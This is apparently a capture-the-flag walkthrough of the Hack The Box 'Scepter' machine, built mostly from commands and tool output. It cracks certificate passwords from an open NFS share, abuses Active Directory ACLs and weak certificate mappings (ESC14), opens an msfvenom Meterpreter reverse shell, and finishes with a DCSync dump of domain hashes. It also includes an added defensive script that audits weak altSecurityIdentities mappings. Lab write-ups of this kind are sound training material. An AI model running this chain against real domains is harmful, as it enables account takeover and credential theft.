Scepter
https://app.hackthebox.com/machines/Scepter
Last updated
Using the htbscan from
[+] Starting recon on 10.10.11.65 (scepter)
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 10.10.11.65 -oA nmap-initial
[sudo] password for kali:
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-04 21:26 CEST
Nmap scan report for 10.10.11.65
Host is up (0.020s latency).
Not shown: 985 closed tcp ports (reset)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-05 03:28:13Z)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/tcp6 rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 2,3,4 111/udp6 rpcbind
| 100003 2,3 2049/udp nfs
| 100003 2,3 2049/udp6 nfs
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100005 1,2,3 2049/tcp mountd
| 100005 1,2,3 2049/tcp6 mountd
| 100005 1,2,3 2049/udp mountd
| 100005 1,2,3 2049/udp6 mountd
| 100021 1,2,3,4 2049/tcp nlockmgr
| 100021 1,2,3,4 2049/tcp6 nlockmgr
| 100021 1,2,3,4 2049/udp nlockmgr
| 100021 1,2,3,4 2049/udp6 nlockmgr
| 100024 1 2049/tcp status
| 100024 1 2049/tcp6 status
| 100024 1 2049/udp status
|_ 100024 1 2049/udp6 status
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
2049/tcp open nlockmgr 1-4 (RPC #100021)
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:03+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: scepter.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T03:22:33
|_Not valid after: 2025-11-01T03:22:33
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_ssl-date: 2025-05-05T03:29:04+00:00; +8h01m26s from scanner time.
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=dc01.scepter.htb
| Subject Alternative Name: DNS:dc01.scepter.htb
| Not valid before: 2024-11-01T00:21:41
|_Not valid after: 2025-11-01T00:41:41
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
We add the domain controller to our hosts file as well (the latest version of htbscan should do this automatically):
<machineip> scepter.htb dc01.scepter.htb
The NFS server exports a share that is readable by everyone and contains several certificates plus one private key. We list the exports and mount the share locally:
❯ showmount -e 10.10.11.65
Export list for 10.10.11.65:
/helpdesk (everyone)
❯ mkdir nfs
❯ sudo mount -t nfs 10.10.11.65:/helpdesk nfs
❯ sudo ls -lha nfs
total 21K
drwx------ 2 4294967294 4294967294 64 Nov 2 2024 .
drwx------ 2 4294967294 4294967294 64 Nov 2 2024 ..
-rwx------ 1 4294967294 4294967294 2.5K Nov 2 2024 baker.crt
-rwx------ 1 4294967294 4294967294 2.0K Nov 2 2024 baker.key
-rwx------ 1 4294967294 4294967294 3.3K Nov 2 2024 clark.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov 2 2024 lewis.pfx
-rwx------ 1 4294967294 4294967294 3.3K Nov 2 2024 scott.pfx
The PFX files are password protected, so we extract a crackable hash with pfx2john and run john against it with rockyou:
❯ sudo pfx2john nfs/lewis.pfx | tee -a helpdesk/lewishash
lewis.pfx:$pfxng$256$32$2048$8$2ae7b9f39c9e4fb3$30820c8e308206fa06092a86<snipped>
❯ john --wordlist=/usr/share/wordlists/rockyou.txt helpdesk/lewishash
[...]
newpassword (lewis.pfx)
The same password decrypts baker.key, so we can repackage baker.crt and baker.key into a PFX of our own. Leave the export password empty (just hit Enter) and fix the file ownership afterwards:
❯ sudo openssl pkcs12 -export -out baker.pfx -inkey nfs/baker.key -in nfs/baker.crt -passin pass:newpassword
Enter Export Password:
Verifying - Enter Export Password:
❯ sudo chown kali:kali baker.pfx
We sync our clock with the DC (nmap reported a skew of about eight hours, far beyond the five minutes Kerberos tolerates; running ntpdate twice is not strictly necessary) and authenticate with the certificate via PKINIT. Certipy returns a TGT and the NT hash of the mapped user:
❯ sudo ntpdate 10.10.11.65
❯ sudo ntpdate 10.10.11.65 | certipy-ad auth -pfx baker.pfx -dc-ip 10.10.11.65
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: d.baker@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'd.baker.ccache'
[*] Trying to retrieve NT hash for 'd.baker'
[*] Got hash for 'd.baker@scepter.htb': aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce
Now we add the DC as our DNS resolver and configure the Kerberos realm, then collect BloodHound data with d.baker's hash to get an overview of how we can escalate further.
/etc/resolv.conf:
nameserver 10.10.11.65
/etc/krb5.conf:
[domain_realm]
.scepter.htb = SCEPTER.HTB
scepter.htb = SCEPTER.HTB
[libdefaults]
default_realm = SCEPTER.HTB
dns_lookup_realm = false
dns_lookup_kdc = true
ticket_lifetime = 24h
forwardable = true
[realms]
SCEPTER.HTB = {
  kdc = dc01.scepter.htb
  admin_server = dc01.scepter.htb
  default_domain = scepter.htb
}
❯ sudo bloodhound-python -u 'd.baker' --hashes 'aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 04S
INFO: Compressing output into 20250508084312_bloodhound.zip
If you haven't installed it already here are the steps:
❯ sudo apt -y install bloodhound
Installing:
bloodhound
Installing dependencies:
binfmt-support fastjar jarwrapper neo4j
Start neo4j, open the link it prints and change the default password. Then start BloodHound in a second terminal and drop the zip file into it; once the import is finished we can use the search box.
❯ sudo neo4j console
Directories in use:
home: /usr/share/neo4j
config: /usr/share/neo4j/conf
[..]
2025-05-08 06:55:32.179+0000 INFO Bolt enabled on localhost:7687.
2025-05-08 06:55:32.856+0000 INFO Remote interface available at http://localhost:7474/
[open browser and change password]
❯ bloodhound
[drop zip-file into bloodhound]
Search for the user d.baker, select the node and run Shortest Paths from this node.
Inspecting the resulting edges and right-clicking a.carter shows ForceChangePassword: d.baker can reset a.carter's password without knowing the current one.
So let's do this:
❯ impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password: Password123
Retype new password: Password123
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
Another BloodHound collection, now with a.carter's new credentials:
❯ sudo bloodhound-python -u 'a.carter' -p 'Password123' -d scepter.htb -dc dc01.scepter.htb --auth-method ntlm -c All --zip --disable-autogc
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: scepter.htb
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.scepter.htb
INFO: Found 11 users
INFO: Found 57 groups
INFO: Found 2 gpos
INFO: Found 3 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.scepter.htb
INFO: Done in 00M 08S
INFO: Compressing output into 20250508083614_bloodhound.zip
The new collection shows that a.carter has full control (GenericAll) over the OU STAFF ACCESS CERTIFICATE, which contains d.baker. An ACE on the OU does not by itself apply to the objects inside it, so the chain below resets a.carter's password again, gets a Kerberos TGT for d.baker, adds an inheritable GenericAll ACE for a.carter on the OU and then uses it to overwrite d.baker's mail attribute:
❯ impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
New password:
Retype new password:
[*] Setting the password of scepter.htb\a.carter as scepter.htb\d.baker
[*] Connecting to DCE/RPC as scepter.htb\d.baker
[*] Password was changed successfully.
[!] User no longer has valid AES keys for Kerberos, until they change their password again.
❯ sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in d.baker@dc01.scepter.htb.ccache
❯ export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache
❯ sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123
[+] Password changed successfully!
❯ sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
[+] a.carter has now GenericAll on OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB
❯ sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb
[+] d.baker's mail has been updated
❯ sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[-] Got error: The NETBIOS connection with the remote host timed out.
[-] Use -debug to print a stacktrace
❯ sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 4
[*] Got certificate without identification
[*] Certificate has no object SID
[*] Saved certificate and private key to 'd.baker.pfx'
The certificate carries the rewritten mail address h.brown@scepter.htb and no object SID, so we request a TGT as h.brown. The DC accepts it because h.brown's account is mapped to certificates by that e-mail address, a weak explicit altSecurityIdentities mapping (ESC14):
❯ sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: h.brown@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'h.brown.ccache'
[*] Trying to retrieve NT hash for 'h.brown'
[*] Got hash for 'h.brown@scepter.htb': aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c
❯ export KRB5CCNAME=./h.brown.ccache
❯ sudo ntpdate -u 10.10.11.65
2025-05-15 01:21:51.653867 (+0200) +28798.893693 +/- 0.009609 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.893693
❯ evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Warning: User is not needed for Kerberos auth. Ticket will be used
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\h.brown\Documents>
For reference, the complete chain in order (impacket-changepasswd prompts for the new password; enter Password123):
impacket-changepasswd 'scepter.htb'/'a.carter'@10.10.11.65 -reset -altuser 'd.baker' -althash :'18b5fb0d99e7a475316213c15b6f22ce'
sudo ntpdate 10.10.11.65 | impacket-getTGT -no-pass -hashes :18b5fb0d99e7a475316213c15b6f22ce scepter.htb/'d.baker'@dc01.scepter.htb
export KRB5CCNAME=d.baker@dc01.scepter.htb.ccache
sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u d.baker -k --host dc01.scepter.htb --dc-ip 10.10.11.65 set password a.carter Password123
sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb --dc-ip 10.10.11.65 add genericAll "OU=STAFF ACCESS CERTIFICATE,DC=SCEPTER,DC=HTB" a.carter
sudo ntpdate -u 10.10.11.65 | bloodyAD -d scepter.htb -u a.carter -p Password123 --host dc01.scepter.htb set object d.baker mail -v h.brown@scepter.htb
sudo ntpdate -u 10.10.11.65 | certipy-ad req -username "d.baker@scepter.htb" -hashes 18b5fb0d99e7a475316213c15b6f22ce -target "dc01.scepter.htb" -ca 'scepter-DC01-CA' -template 'StaffAccessCertificate'
sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx d.baker.pfx -domain scepter.htb -dc-ip 10.10.11.65 -username h.brown
export KRB5CCNAME=./h.brown.ccache
sudo ntpdate -u 10.10.11.65
evil-winrm -i dc01.scepter.htb -r scepter.htb -u h.brown
Next we get a more stable Meterpreter session: create the payload with msfvenom and start a listener in Metasploit.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<ip> LPORT=4243 -f exe -o shell.exe
❯ msfconsole
=[ metasploit v6.4.50-dev ]
+ -- --=[ 2496 exploits - 1283 auxiliary - 431 post ]
+ -- --=[ 1610 payloads - 49 encoders - 13 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set lhost tun0
lhost => tun0
msf6 exploit(multi/handler) > set lport 4243
lport => 4243
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run -j
Upload the payload through Evil-WinRM and execute it:
*Evil-WinRM* PS C:\Users\h.brown\Downloads> upload shell.exe
Info: Uploading /mnt/e/hacking/hackthebox/Machines/scepter/shell.exe to C:\Users\h.brown\Downloads\shell.exe
Data: 9556 bytes of 9556 bytes copied
Info: Upload successful!
*Evil-WinRM* PS C:\Users\h.brown\Downloads> ./shell.exe
*Evil-WinRM* PS C:\Users\h.brown\Downloads>
msf6 exploit(multi/handler) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x64/windows SCEPTER\h.brown @ DC01 <ip>:4243 -> 10.10.11.65:52384 (10.10.11.65)
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
Privilege escalation goes through another certificate mapping. With a.carter we create a computer account (the default MachineAccountQuota lets any authenticated user add up to ten), request a certificate from the Machine template for it, and inspect the resulting X.509 certificate to get its issuer and serial number:
❯ sudo ntpdate -u 10.10.11.65 | bloodyAD --host dc01.scepter.htb -d scepter.htb -u a.carter -p 'Password123' --dc-ip 10.10.11.65 add computer meow 'Password123'
[+] meow created
❯ certipy-ad req -ca scepter-DC01-CA -template Machine -target 10.10.11.65 -username meow$ -password 'Password123'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 11
[*] Got certificate with DNS Host Name 'meow.scepter.htb'
[*] Certificate object SID is 'S-1-5-21-74879546-916818434-740295365-9102'
[*] Saved certificate and private key to 'meow.pfx'
❯ certipy-ad cert -pfx meow.pfx -nokey -out "meow.crt"
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing certificate and to 'meow.crt'
❯ openssl x509 -in meow.crt -noout -text
Certificate:
Data:
Version: 3 (0x2)
Serial Number:
62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e
Signature Algorithm: sha256WithRSAEncryption
Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA
[...]
We add meow.scepter.htb to our hosts file. Then we build the strong explicit certificate mapping X509:<I>issuer<SR>serial for the machine certificate: Windows wants the issuer DN with its components in reversed order and the serial number as hex with the byte order reversed. Writing this value into p.adams's altSecurityIdentities (which h.brown is allowed to modify) makes the DC accept meow.pfx as a logon certificate for p.adams. The small script below does the conversion:
# conv.py
# Build the X509:<I>issuer<SR>serial value for altSecurityIdentities.
# Windows expects the issuer DN in reversed RDN order (DC=htb,DC=scepter,CN=...)
# and the certificate serial number as hex with the byte order reversed.
import argparse


def parse_serial(hex_serial):
    """Remove colons and reverse the byte order of the serial number."""
    hex_serial = hex_serial.replace(":", "")
    pairs = [hex_serial[i:i + 2] for i in range(0, len(hex_serial), 2)]
    return "".join(pairs[::-1]).lower()


def format_altsecid(issuer, serial):
    """Reverse the RDN order of an LDAP-style issuer DN and assemble the mapping string."""
    issuer_parts = [p.strip() for p in issuer.split(",")][::-1]
    return f"X509:<I>{','.join(issuer_parts)}<SR>{parse_serial(serial)}"


if __name__ == "__main__":
    ap = argparse.ArgumentParser(description="Build an altSecurityIdentities issuer/serial mapping")
    ap.add_argument("-serial", required=True, help="serial number as printed by openssl x509 -text")
    ap.add_argument("-issuer", required=True, help="issuer DN in LDAP order, e.g. CN=ca,DC=scepter,DC=htb")
    args = ap.parse_args()
    print(format_altsecid(args.issuer, args.serial))
❯ python3 conv.py -serial '62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e' -issuer 'CN=scepter-DC01-CA,DC=scepter,DC=htb'
X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062
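As an added example (not part of the original writeup), the script below covers both certificate-mapping steps of this box from the other side of the table: it builds the same X509:<I>…<SR>… value straight from `openssl x509 -noout -text` output (openssl already prints the issuer RDNs in the order Windows wants, so no reversal is needed there), and it classifies altSecurityIdentities values as strong or weak according to Microsoft KB5014754, which is how a defender finds the e-mail (RFC822) mapping that let the d.baker certificate log on as h.brown. The LDIF lines fed to the audit are constructed sample data; the openssl text is the certificate block shown above.

```python
import re

# Explicit certificate mapping types from Microsoft KB5014754. A weak mapping is
# satisfied by any certificate carrying the right subject or e-mail address, which
# is what let the d.baker certificate (mail set to h.brown@scepter.htb) log on as h.brown.
STRONG_TYPES = {"<I><SR>", "<SKI>", "<SHA1-PUKEY>"}
WEAK_TYPES = {"<S>", "<I><S>", "<RFC822>"}


def reverse_serial(hex_serial):
    """Strip colons and reverse the byte order: Windows stores the serial little-endian."""
    digits = hex_serial.replace(":", "").replace(" ", "").lower()
    if len(digits) % 2:
        digits = "0" + digits
    pairs = [digits[i:i + 2] for i in range(0, len(digits), 2)]
    return "".join(reversed(pairs))


def mapping_from_openssl_text(text):
    """Build X509:<I>issuer<SR>serial from `openssl x509 -noout -text` output.

    openssl prints the issuer RDNs in encoded order (DC=htb, DC=scepter, CN=...),
    which is already the order altSecurityIdentities expects, so only the spacing
    is normalised. Short serials are printed as 'decimal (0xhex)'; the hex is used.
    """
    issuer = re.search(r"^\s*Issuer:\s*(.+?)\s*$", text, re.M)
    serial = re.search(r"Serial Number:\s*([^\n]+)", text)
    if not issuer or not serial:
        raise ValueError("issuer or serial number not found in openssl output")
    rdns = []
    for part in issuer.group(1).split(","):
        attr, _, value = part.partition("=")
        rdns.append(f"{attr.strip()}={value.strip()}")
    raw = serial.group(1).strip()
    short = re.search(r"\(0x([0-9a-fA-F]+)\)", raw)
    if short:
        raw = short.group(1)
    return f"X509:<I>{','.join(rdns)}<SR>{reverse_serial(raw)}"


def classify_mapping(value):
    """Return (strength, mapping type) for one altSecurityIdentities value."""
    if not value.startswith("X509:"):
        return "unknown", value  # Kerberos/other mapping formats are out of scope here
    tags = "".join(re.findall(r"<(?:I|S|SR|SKI|SHA1-PUKEY|RFC822)>", value))
    if tags in STRONG_TYPES:
        return "strong", tags
    if tags in WEAK_TYPES:
        return "weak", tags
    return "unknown", tags


def audit_altsecids(ldif_lines):
    """Walk an LDIF export (dn: / altSecurityIdentities: lines) and return the weak
    mappings per object; this is the check that catches ESC14-style exposure."""
    findings = {}
    current = None
    for line in ldif_lines:
        if line.startswith("dn:"):
            current = line[3:].strip()
        elif line.startswith("altSecurityIdentities:") and current:
            value = line.split(":", 1)[1].strip()
            strength, kind = classify_mapping(value)
            if strength == "weak":
                findings.setdefault(current, []).append((kind, value))
    return findings


# Issuer/serial block as printed by `openssl x509 -noout -text` for meow.crt above.
OPENSSL_TEXT = """\
Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number:
            62:00:00:00:0e:2d:24:d9:92:4d:f7:a4:cc:00:00:00:00:00:0e
        Signature Algorithm: sha256WithRSAEncryption
        Issuer: DC=htb, DC=scepter, CN=scepter-DC01-CA
"""

# Constructed sample export (not taken from the box). h.brown's entry is the kind of
# e-mail mapping the StaffAccessCertificate step abused; svc_backup is a made-up
# account with the weak issuer+subject form; p.adams carries the strong mapping built above.
SAMPLE_LDIF = """\
dn: CN=h.brown,OU=Staff Access Certificate,DC=scepter,DC=htb
altSecurityIdentities: X509:<RFC822>h.brown@scepter.htb

dn: CN=p.adams,CN=Users,DC=scepter,DC=htb
altSecurityIdentities: X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062

dn: CN=svc_backup,CN=Users,DC=scepter,DC=htb
altSecurityIdentities: X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<S>CN=svc_backup
""".splitlines()

if __name__ == "__main__":
    print(mapping_from_openssl_text(OPENSSL_TEXT))
    for dn, weak in audit_altsecids(SAMPLE_LDIF).items():
        for kind, value in weak:
            print(f"WEAK {kind:9} {dn}: {value}")
```

Only X509 mappings are classified; the weak types should be replaced by issuer+serial, SKI or SHA1-PUKEY mappings, or removed, since any CA-issued certificate with a matching subject or e-mail logs on as that account.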
Back in the Meterpreter session as h.brown we drop into PowerShell and write the mapping into p.adams's altSecurityIdentities:
msf6 exploit(multi/handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > shell
Process 4992 created.
Channel 1 created.
Microsoft Windows [Version 10.0.17763.7136]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Users\h.brown\Downloads>powershell
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Users\h.brown\Downloads> $map = 'X509:<I>DC=htb,DC=scepter,CN=scepter-DC01-CA<SR>0e0000000000cca4f74d92d9242d0e00000062'
PS C:\Users\h.brown\Downloads> Set-ADUser p.adams -Replace @{altSecurityIdentities=$map}
❯ sudo ntpdate -u 10.10.11.65
2025-05-15 02:12:39.713454 (+0200) +28798.933465 +/- 0.009446 10.10.11.65 s1 no-leap
CLOCK: time stepped by 28798.933465
Certipy warns that the certificate identifies meow$ rather than p.adams, but the DC honours the explicit mapping. With p.adams's hash we can DCSync the domain:
❯ sudo ntpdate -u 10.10.11.65 | certipy-ad auth -pfx meow.pfx -dc-ip 10.10.11.65 -username p.adams
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] The provided username does not match the identification found in the provided certificate: 'P.ADAMS' - 'meow$'
Do you want to continue? (Y/n) [*] Using principal: p.adams@scepter.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'p.adams.ccache'
[*] Trying to retrieve NT hash for 'p.adams'
[*] Got hash for 'p.adams@scepter.htb': aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0
â python3 /usr/share/doc/python3-impacket/examples/secretsdump.py -just-dc -hashes aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0 scepter.htb/p.adams@10.10.11.65
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a291ead3493f9773dc615e66c2ea21c4:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:c030fca580038cc8b1100ee37064a4a9:::
scepter.htb\d.baker:1106:aad3b435b51404eeaad3b435b51404ee:18b5fb0d99e7a475316213c15b6f22ce:::
scepter.htb\a.carter:1107:aad3b435b51404eeaad3b435b51404ee:2e24650b1e4f376fa574da438078d200:::
scepter.htb\h.brown:1108:aad3b435b51404eeaad3b435b51404ee:4ecf5242092c6fb8c360a08069c75a0c:::
scepter.htb\p.adams:1109:aad3b435b51404eeaad3b435b51404ee:1b925c524f447bb821a8789c4b118ce0:::
scepter.htb\e.lewis:2101:aad3b435b51404eeaad3b435b51404ee:628bf1914e9efe3ef3a7a6e7136f60f3:::
scepter.htb\o.scott:2102:aad3b435b51404eeaad3b435b51404ee:3a4a844d2175c90f7a48e77fa92fce04:::
scepter.htb\M.clark:2103:aad3b435b51404eeaad3b435b51404ee:8db1c7370a5e33541985b508ffa24ce5:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:0a4643c21fd6a17229b18ba639ccfd5f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:cc5d676d45f8287aef2f1abcd65213d9575c86c54c9b1977935983e28348bcd5
Administrator:aes128-cts-hmac-sha1-96:bb557b22bad08c219ce7425f2fe0b70c
Administrator:des-cbc-md5:f79d45bf688aa238
krbtgt:aes256-cts-hmac-sha1-96:5d62c1b68af2bb009bb4875327edd5e4065ef2bf08e38c4ea0e609406d6279ee
krbtgt:aes128-cts-hmac-sha1-96:b9bc4dc299fe99a4e086bbf2110ad676
krbtgt:des-cbc-md5:57f8ef4f4c7f6245
scepter.htb\d.baker:aes256-cts-hmac-sha1-96:6adbc9de0cb3fb631434e513b1b282970fdc3ca089181991fb7036a05c6212fb
scepter.htb\d.baker:aes128-cts-hmac-sha1-96:eb3e28d1b99120b4f642419c99a7ac19
scepter.htb\d.baker:des-cbc-md5:2fce8a3426c8c2c1
scepter.htb\a.carter:aes256-cts-hmac-sha1-96:5a793dad7f782356cb6a741fe73ddd650ca054870f0c6d70fadcae162a389a71
scepter.htb\a.carter:aes128-cts-hmac-sha1-96:f7643849c000f5a7a6bd5c88c4724afd
scepter.htb\a.carter:des-cbc-md5:d607b098cb5e679b
scepter.htb\h.brown:aes256-cts-hmac-sha1-96:5779e2a207a7c94d20be1a105bed84e3b691a5f2890a7775d8f036741dadbc02
scepter.htb\h.brown:aes128-cts-hmac-sha1-96:1345228e68dce06f6109d4d64409007d
scepter.htb\h.brown:des-cbc-md5:6e6dd30151cb58c7
scepter.htb\p.adams:aes256-cts-hmac-sha1-96:0fa360ee62cb0e7ba851fce9fd982382c049ba3b6224cceb2abd2628c310c22f
scepter.htb\p.adams:aes128-cts-hmac-sha1-96:85462bdef70af52770b2260963e7b39f
scepter.htb\p.adams:des-cbc-md5:f7a26e794949fd61
scepter.htb\e.lewis:aes256-cts-hmac-sha1-96:1cfd55c20eadbaf4b8183c302a55c459a2235b88540ccd75419d430e049a4a2b
scepter.htb\e.lewis:aes128-cts-hmac-sha1-96:a8641db596e1d26b6a6943fc7a9e4bea
scepter.htb\e.lewis:des-cbc-md5:57e9291aad91fe7f
